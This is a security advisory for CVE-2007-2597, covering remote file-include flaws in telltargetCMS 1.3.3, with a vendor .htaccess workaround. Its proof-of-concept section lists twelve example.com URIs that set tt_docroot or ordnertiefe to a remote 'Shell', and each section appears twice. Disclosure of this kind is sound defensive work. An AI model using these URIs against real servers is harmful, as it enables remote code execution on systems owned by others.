TellTargetCMS Multiple Remote File Include Vulnerabilities
BID:23903
Info
TellTargetCMS Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 23903 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-2597 |
| Remote: | Yes |
| Local: | No |
| Published: | May 09 2007 12:00AM |
| Updated: | May 07 2015 05:39PM |
| Credit: | GolD_M is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
PeterCMS telltargetCMS 1.3.3 |
| Not Vulnerable: | |
Discussion
TellTargetCMS Multiple Remote File Include Vulnerabilities
telltargetCMS is prone to multiple remote file-includes vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process.
These issues affect telltargetCMS 1.3.3 and prior versions.
telltargetCMS is prone to multiple remote file-includes vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process.
These issues affect telltargetCMS 1.3.3 and prior versions.
Exploit / POC
TellTargetCMS Multiple Remote File Include Vulnerabilities
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/phplib/site_conf.php?ordnertiefe=Shell
http://www.example.com/phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=Shell
http://www.example.com/phplib/version/1.3.3/functionen/produkte_nach_serie.php?tt_docroot=Shell
http://www.example.com/phplib/version/1.3.3/functionen/ref_kd_rubrik.php?tt_docroot=Shell
http://www.example.com/phplib/version/1.3.3/module/hg_referenz_jobgalerie.php?tt_docroot=Shell
http://www.example.com/phplib/version/1.3.3/module/surfer_anmeldung_NWL.php?tt_docroot=Shell
http://www.example.com/phplib/version/1.3.3/module/produkte_nach_serie_alle.php?tt_docroot=Shell
http://www.example.com/phplib/version/1.3.3/module/surfer_aendern.php?tt_docroot=Shell
http://www.example.com/phplib/version/1.3.3/module/ref_kd_rubrik.php?tt_docroot=Shell
http://www.example.com/phplib/version/1.3.3/module/referenz.php?tt_docroot=Shell
http://www.example.com/phplib/version/1.3.3/standard/1/lay.php?tt_docroot=Shell
http://www.example.com/phplib/version/1.3.3/standard/3/lay.php?tt_docroot=Shell
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/phplib/site_conf.php?ordnertiefe=Shell
http://www.example.com/phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=Shell
http://www.example.com/phplib/version/1.3.3/functionen/produkte_nach_serie.php?tt_docroot=Shell
http://www.example.com/phplib/version/1.3.3/functionen/ref_kd_rubrik.php?tt_docroot=Shell
http://www.example.com/phplib/version/1.3.3/module/hg_referenz_jobgalerie.php?tt_docroot=Shell
http://www.example.com/phplib/version/1.3.3/module/surfer_anmeldung_NWL.php?tt_docroot=Shell
http://www.example.com/phplib/version/1.3.3/module/produkte_nach_serie_alle.php?tt_docroot=Shell
http://www.example.com/phplib/version/1.3.3/module/surfer_aendern.php?tt_docroot=Shell
http://www.example.com/phplib/version/1.3.3/module/ref_kd_rubrik.php?tt_docroot=Shell
http://www.example.com/phplib/version/1.3.3/module/referenz.php?tt_docroot=Shell
http://www.example.com/phplib/version/1.3.3/standard/1/lay.php?tt_docroot=Shell
http://www.example.com/phplib/version/1.3.3/standard/3/lay.php?tt_docroot=Shell
Solution / Fix
TellTargetCMS Multiple Remote File Include Vulnerabilities
Solution:
The vendor states that, under normal circumstances, the affected scripts are outside of the webserver document root and are therefore inaccessible from a web browser.
For instances where the scripts are accessible, the vendor suggests adding an '.htaccess' file containing the following information to the 'phplib' directory:
RewriteEngine On
RewriteRule (.*) http://%{SERVER_NAME}
Solution:
The vendor states that, under normal circumstances, the affected scripts are outside of the webserver document root and are therefore inaccessible from a web browser.
For instances where the scripts are accessible, the vendor suggests adding an '.htaccess' file containing the following information to the 'phplib' directory:
RewriteEngine On
RewriteRule (.*) http://%{SERVER_NAME}
References
TellTargetCMS Multiple Remote File Include Vulnerabilities
References:
References:
- telltargetCMS Homepage (PeterCMS)